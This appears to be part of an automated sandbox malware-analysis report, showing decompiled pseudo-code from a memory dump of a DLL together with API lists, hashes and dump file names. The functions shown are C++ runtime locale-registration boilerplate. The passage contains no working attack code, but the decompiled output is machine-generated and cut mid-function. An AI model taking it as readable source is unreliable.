										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6D486FD3(__eflags, _t308);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6d546e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6D486FD3(__eflags, _t307);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6d546e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D49B7F9
std::_Lockit::_Lockit.LIBCPMT ref: 6D49B803
int.LIBCPMT ref: 6D49B81A

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

messages.LIBCPMT ref: 6D49B83D
std::_Facet_Register.LIBCPMT ref: 6D49B854
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49B874
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49B892

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 3aa72b5272e881979272a1a7815dd27630060efacf22c1a259c8a4c1db3c6c24
Instruction ID: 00fa65088f8f25e43702fabee73ee7f86578a94643ceee72b398232552a14c46
Opcode Fuzzy Hash: 3aa72b5272e881979272a1a7815dd27630060efacf22c1a259c8a4c1db3c6c24
Instruction Fuzzy Hash: 0E11E375808119DBCF04EB65C880EEEBBB5AF98314F1A400CD611AB390DB70DD018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F60D, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t506 - 0x14, 0);
				_t483 =  *0x6d546df4; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6D46161C(0x6d546da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6D4866BA(_t506 - 0x14);
					return E6D4A0075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6D4911AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t506 - 0x20);
							E6D4A3D74(_t506 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t471, _t483, 0x14);
							E6D486653(_t506 - 0x14, 0);
							_t484 =  *0x6d546dc8; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6D46161C(0x6d546d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6D4866BA(_t506 - 0x14);
								return E6D4A0075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6D491230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t506 - 0x20);
										E6D4A3D74(_t506 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t358, _t472, _t484, 0x14);
										E6D486653(_t506 - 0x14, 0);
										_t485 =  *0x6d546dc4; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6D46161C(0x6d546d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6D4866BA(_t506 - 0x14);
											return E6D4A0075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6D4912B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t506 - 0x20);
													E6D4A3D74(_t506 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t358, _t473, _t485, 0x14);
													E6D486653(_t506 - 0x14, 0);
													_t486 =  *0x6d546dd8; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6D46161C(0x6d546d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6D4866BA(_t506 - 0x14);
														return E6D4A0075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6D491339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t506 - 0x20);
																E6D4A3D74(_t506 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t358, _t474, _t486, 0x14);
																E6D486653(_t506 - 0x14, 0);
																_t487 =  *0x6d546db0; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6D46161C(0x6d546d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6D4866BA(_t506 - 0x14);
																	return E6D4A0075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6D4913A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t506 - 0x20);
																			E6D4A3D74(_t506 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t358, _t475, _t487, 0x14);
																			E6D486653(_t506 - 0x14, 0);
																			_t488 =  *0x6d546ddc; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6D46161C(0x6d546d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6D4866BA(_t506 - 0x14);
																				return E6D4A0075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6D491409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t506 - 0x20);
																						E6D4A3D74(_t506 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t358, _t476, _t488, 0x14);
																						E6D486653(_t506 - 0x14, 0);
																						_t489 =  *0x6d546de0; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6D46161C(0x6d546d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6D4866BA(_t506 - 0x14);
																							return E6D4A0075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6D491471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t506 - 0x20);
																									E6D4A3D74(_t506 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t358, _t477, _t489, 0x14);
																									E6D486653(_t506 - 0x14, 0);
																									_t490 =  *0x6d546dfc; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6D46161C(0x6d546da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6D4866BA(_t506 - 0x14);
																										return E6D4A0075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6D4914EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t506 - 0x20);
																												E6D4A3D74(_t506 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t358, _t478, _t490, 0x14);
																												E6D486653(_t506 - 0x14, 0);
																												_t491 =  *0x6d546dcc; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6D46161C(0x6d546d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6D4866BA(_t506 - 0x14);
																													return E6D4A0075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6D491558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t506 - 0x20);
																															E6D4A3D74(_t506 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t358, _t479, _t491, 0x14);
																															E6D486653(_t506 - 0x14, 0);
																															_t492 =  *0x6d546e00; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6D46161C(0x6d546dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6D4866BA(_t506 - 0x14);
																																return E6D4A0075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6D4915C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t506 - 0x20);
																																		E6D4A3D74(_t506 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t358, _t480, _t492, 0x14);
																																		E6D486653(_t506 - 0x14, 0);
																																		_t493 =  *0x6d546dd0; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6D46161C(0x6d546d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6D4866BA(_t506 - 0x14);
																																			return E6D4A0075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6D49162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6D461438(_t435);
																																					E6D4A3D74(_t506 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6d4ec0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6D49542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6D4A0075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6D486FD3(__eflags, _t481);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6d546dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6D486FD3(__eflags, _t480);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6d546e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6D486FD3(__eflags, _t479);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6d546dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6D486FD3(__eflags, _t478);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6d546dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6D486FD3(__eflags, _t477);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6d546de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6D486FD3(__eflags, _t476);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6d546ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6D486FD3(__eflags, _t475);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6d546db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6D486FD3(__eflags, _t474);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6d546dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6D486FD3(__eflags, _t473);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6d546dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6D486FD3(__eflags, _t472);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6d546dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6D486FD3(__eflags, _t471);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6d546df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F614
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F61E
int.LIBCPMT ref: 6D48F635

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D48F658
std::_Facet_Register.LIBCPMT ref: 6D48F66F
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F68F
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F6AD

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: ad86ba0c0db8dad46c972ac625ad92d57bb4ebaac78d86e7cba7e7c878addc79
Instruction ID: 1ec6dc54ee9f83254654b7eb81642b99eb5018db73a59d9fd64be1568c9ae4ef
Opcode Fuzzy Hash: ad86ba0c0db8dad46c972ac625ad92d57bb4ebaac78d86e7cba7e7c878addc79
Instruction Fuzzy Hash: 6B11E07580825A9BCF05EBA0C840FEDBB74AFA4314F2A450DD612BB396CB70DD0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F183, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F183(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;

				_t756 = __edx;
				_t575 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t814 - 0x14, 0);
				_t777 =  *0x6d546de8; // 0x0
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6D46161C(0x6d546d94);
				_t578 =  *((intOrPtr*)(_t814 + 8));
				_t266 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6D4866BA(_t814 - 0x14);
					return E6D4A0075(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6D490EB7(__ebx, _t578, __edx, _t758, _t777) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t814 - 0x20);
							E6D4A3D74(_t814 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t758, _t777, 0x14);
							E6D486653(_t814 - 0x14, 0);
							_t778 =  *0x6d546db8; // 0x0
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6D46161C(0x6d546d6c);
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6D4866BA(_t814 - 0x14);
								return E6D4A0075(_t759);
							} else {
								__eflags = _t778;
								if(_t778 == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6D490F1F(_t575, _t585, __edx, _t759, _t778) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t814 - 0x20);
										E6D4A3D74(_t814 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t575, _t759, _t778, 0x14);
										E6D486653(_t814 - 0x14, 0);
										_t779 =  *0x6d546dec; // 0x0
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6D46161C(0x6d546d98);
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6D4866BA(_t814 - 0x14);
											return E6D4A0075(_t760);
										} else {
											__eflags = _t779;
											if(_t779 == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6D490F87(_t575, _t592, __edx, _t760, _t779) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t814 - 0x20);
													E6D4A3D74(_t814 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t575, _t760, _t779, 0x14);
													E6D486653(_t814 - 0x14, 0);
													_t780 =  *0x6d546dbc; // 0x0
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6D46161C(0x6d546d70);
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6D4866BA(_t814 - 0x14);
														return E6D4A0075(_t761);
													} else {
														__eflags = _t780;
														if(_t780 == 0) {
															_push( *((intOrPtr*)(_t814 + 8)));
															_push(_t814 - 0x10);
															__eflags = E6D490FEF(_t575, _t599, _t756, _t761, _t780) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t814 - 0x20);
																E6D4A3D74(_t814 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t575, _t761, _t780, 0x14);
																E6D486653(_t814 - 0x14, 0);
																_t781 =  *0x6d546df0; // 0x0
																 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																 *(_t814 - 0x10) = _t781;
																_t317 = E6D46161C(0x6d546d9c);
																_t606 =  *((intOrPtr*)(_t814 + 8));
																_t762 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t317);
																__eflags = _t762;
																if(_t762 != 0) {
																	L33:
																	E6D4866BA(_t814 - 0x14);
																	return E6D4A0075(_t762);
																} else {
																	__eflags = _t781;
																	if(_t781 == 0) {
																		_push( *((intOrPtr*)(_t814 + 8)));
																		_push(_t814 - 0x10);
																		__eflags = E6D491057(_t575, _t606, _t756, _t762, _t781) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t814 - 0x20);
																			E6D4A3D74(_t814 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t575, _t762, _t781, 0x14);
																			E6D486653(_t814 - 0x14, 0);
																			_t782 =  *0x6d546dc0; // 0x0
																			 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																			 *(_t814 - 0x10) = _t782;
																			_t330 = E6D46161C(0x6d546d74);
																			_t613 =  *((intOrPtr*)(_t814 + 8));
																			_t763 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t330);
																			__eflags = _t763;
																			if(_t763 != 0) {
																				L40:
																				E6D4866BA(_t814 - 0x14);
																				return E6D4A0075(_t763);
																			} else {
																				__eflags = _t782;
																				if(_t782 == 0) {
																					_push( *((intOrPtr*)(_t814 + 8)));
																					_push(_t814 - 0x10);
																					__eflags = E6D4910BF(_t575, _t613, _t756, _t763, _t782) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t814 - 0x20);
																						E6D4A3D74(_t814 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t575, _t763, _t782, 0x14);
																						E6D486653(_t814 - 0x14, 0);
																						_t783 =  *0x6d546df8; // 0x0
																						 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																						 *(_t814 - 0x10) = _t783;
																						_t343 = E6D46161C(0x6d546da4);
																						_t620 =  *((intOrPtr*)(_t814 + 8));
																						_t764 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t343);
																						__eflags = _t764;
																						if(_t764 != 0) {
																							L47:
																							E6D4866BA(_t814 - 0x14);
																							return E6D4A0075(_t764);
																						} else {
																							__eflags = _t783;
																							if(_t783 == 0) {
																								_push( *((intOrPtr*)(_t814 + 8)));
																								_push(_t814 - 0x10);
																								__eflags = E6D491127(_t575, _t620, _t756, _t764, _t783) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t814 - 0x20);
																									E6D4A3D74(_t814 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t575, _t764, _t783, 0x14);
																									E6D486653(_t814 - 0x14, 0);
																									_t784 =  *0x6d546df4; // 0x0
																									 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																									 *(_t814 - 0x10) = _t784;
																									_t356 = E6D46161C(0x6d546da0);
																									_t627 =  *((intOrPtr*)(_t814 + 8));
																									_t765 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t356);
																									__eflags = _t765;
																									if(_t765 != 0) {
																										L54:
																										E6D4866BA(_t814 - 0x14);
																										return E6D4A0075(_t765);
																									} else {
																										__eflags = _t784;
																										if(_t784 == 0) {
																											_push( *((intOrPtr*)(_t814 + 8)));
																											_push(_t814 - 0x10);
																											__eflags = E6D4911AB(_t575, _t627, _t756, _t765, _t784) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t814 - 0x20);
																												E6D4A3D74(_t814 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t575, _t765, _t784, 0x14);
																												E6D486653(_t814 - 0x14, 0);
																												_t785 =  *0x6d546dc8; // 0x0
																												 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																												 *(_t814 - 0x10) = _t785;
																												_t369 = E6D46161C(0x6d546d7c);
